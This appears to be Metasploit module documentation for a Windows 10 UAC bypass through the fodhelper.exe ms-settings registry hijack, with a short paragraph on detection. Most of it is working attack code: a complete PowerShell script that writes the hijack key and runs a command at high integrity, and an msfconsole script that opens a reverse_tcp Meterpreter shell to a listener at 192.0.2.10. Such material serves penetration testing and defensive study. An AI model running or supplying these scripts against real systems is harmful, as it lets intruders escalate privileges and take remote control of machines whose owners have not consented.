Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
## Vulnerable Application

### Introduction
This module bypasses Windows 10 UAC by hijacking a special key in the Registry under the current user hive (`HKCU\Software\Classes\ms-settings\shell\open\command`) and inserting a custom command that gets invoked when the auto-elevating Windows `fodhelper.exe` application is launched. It spawns a second shell that has the UAC flag turned off, i.e. a high-integrity session. The bypass only applies when the current user is a member of the local Administrators group running under a filtered (medium-integrity) token and UAC is not set to "Always notify", since `fodhelper.exe` auto-elevates only at the default or lower notification levels.

This module modifies a registry key, but cleans up the key once the payload has been invoked.

The module does not require the architecture of the payload to match the OS. If specifying `EXE::Custom`, your DLL should call `ExitProcess()` after starting your payload in a separate process.
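The following PowerShell script reproduces, step by step, what the module does on the target: it checks the preconditions (filtered admin token, UAC level), writes the hijacked `ms-settings` handler, launches `fodhelper.exe`, waits the same five seconds, and removes the key again. It is an added example for illustration and is not the module's own code; the `$Command` payload, the output file path and the five-second wait are assumptions chosen so the result can be verified from an ordinary shell.

```powershell
# Added example, not the module's own code: reproduces the registry hijack the
# module performs, checks the preconditions it depends on, and removes the key
# afterwards. $Command is an assumption standing in for the module's payload;
# here it records the elevated token's groups so the result can be verified.
param(
    [string]$Command = 'cmd.exe /c whoami /groups > C:\Users\Public\fodhelper_test.txt'
)

$ErrorActionPreference = 'Stop'
$key      = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
$classKey = 'HKCU:\Software\Classes\ms-settings'
$policy   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Precondition 1: the caller holds an admin token that UAC has filtered down to
# medium integrity. Administrators (S-1-5-32-544) is present in the group list,
# but IsInRole() stays false until the token is elevated.
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdminMember = $id.Groups -contains 'S-1-5-32-544'
$isElevated    = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                     [Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdminMember) { throw 'User is not in the local Administrators group; nothing to elevate.' }
if ($isElevated)         { throw 'Token is already elevated; the bypass is not needed.' }

# Precondition 2: UAC enabled and not at "Always notify" (ConsentPromptBehaviorAdmin = 2),
# which switches off the auto-elevation fodhelper.exe relies on. 5 is the Windows default.
$uac = Get-ItemProperty -Path $policy
if ($uac.EnableLUA -ne 1)                  { throw 'UAC is disabled; no bypass required.' }
if ($uac.ConsentPromptBehaviorAdmin -eq 2) { throw 'UAC is set to Always notify; fodhelper will not auto-elevate.' }

# Remember whether the class key already existed so cleanup removes only what we added.
$preExisting = Test-Path $classKey

try {
    # The hijack: fodhelper.exe opens the ms-settings: protocol handler, and the
    # per-user Classes hive shadows the HKLM definition. An empty DelegateExecute
    # value makes the shell run (default) as a plain command line instead of
    # dispatching to the registered COM handler.
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
    Set-ItemProperty -Path $key -Name '(default)' -Value $Command

    Start-Process -FilePath "$env:windir\System32\fodhelper.exe"

    # Same fixed wait the module uses before tearing the key down. On a slow host the
    # elevated process may not have read the key yet; that is the failure mode to watch.
    Start-Sleep -Seconds 5
}
finally {
    if ($preExisting) {
        Write-Warning "$classKey existed before this run; removing only the values written here."
        Remove-ItemProperty -Path $key -Name 'DelegateExecute', '(default)' -ErrorAction SilentlyContinue
    } else {
        Remove-Item -Path $classKey -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Verification: the output file is written by the elevated child, so it should list
# "Mandatory Label\High Mandatory Level" rather than Medium.
if (Test-Path 'C:\Users\Public\fodhelper_test.txt') {
    Select-String -Path 'C:\Users\Public\fodhelper_test.txt' -Pattern 'Mandatory Level'
}
```

From the defender's side the same key is the detection point: a registry value set under `HKCU\Software\Classes\ms-settings\shell\open\command` by a medium-integrity process, shortly followed by `fodhelper.exe` spawning a child that is not the Settings app, is the observable sequence, and the cleanup step in the `finally` block is why the key is usually gone by the time anyone looks for it.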
## Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the `payload` and `session` options. The module uses a hardcoded timeout of 5 seconds during which it expects `fodhelper.exe` to be launched on the target system. On slower systems this may be too short, resulting in no session being created, because the module's built-in handler is torn down when the module returns. In this case, disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`) and manually create a job handler corresponding to the payload, so the listener stays up and catches the callback whenever the elevated process finally runs.
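The procedure above, written out as the commands typed into `msfconsole` (usable as a resource script). This is an added example and not taken from the module's documentation; the payload type, the listener address `192.0.2.10:4445` and session ID `1` are assumptions chosen for illustration.

```text
# Added example (not from the module's documentation). Assumed values: session 1 is
# the existing medium-integrity session on the target, 192.0.2.10:4445 is the listener.

# 1. Start a persistent handler as a background job so it outlives the module's
#    5 second timeout. ExitOnSession false keeps it listening after a callback.
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.0.2.10
set LPORT 4445
set ExitOnSession false
run -j

# 2. Run the bypass against the existing session with the built-in handler disabled.
#    The payload, LHOST and LPORT must match the handler started above.
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.0.2.10
set LPORT 4445
set DISABLEPAYLOADHANDLER true
run
```

When the elevated payload calls back, the new session is registered by the background handler job rather than by the module, so it may appear after `run` has already returned; `sessions -l` shows it alongside the original one.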